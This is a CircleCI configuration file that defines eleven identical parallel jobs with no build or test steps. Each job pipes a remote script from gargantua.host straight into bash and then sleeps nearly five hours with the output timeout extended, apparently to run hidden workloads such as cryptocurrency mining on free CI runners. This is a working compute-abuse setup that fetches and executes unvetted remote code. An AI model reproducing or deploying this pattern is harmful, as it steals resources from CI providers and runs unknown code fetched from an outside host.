version: 2.1

jobs:
  mariahcareu:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylista.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mariahcareu1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylista.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mariahcareu2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylista.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mariahcareu3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylista.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mariahcareu4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylista.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mariahcareu5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylista.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mariahcareu6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylista.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mariahcareu7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylista.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mariahcareu8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylista.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mariahcareu9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylista.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  mariahcareu10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylista.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

workflows:
  main:
    jobs:
      - mariahcareu
      - mariahcareu1
      - mariahcareu2
      - mariahcareu3
      - mariahcareu4
      - mariahcareu5
      - mariahcareu6
      - mariahcareu7
      - mariahcareu8
      - mariahcareu9
      - mariahcareu10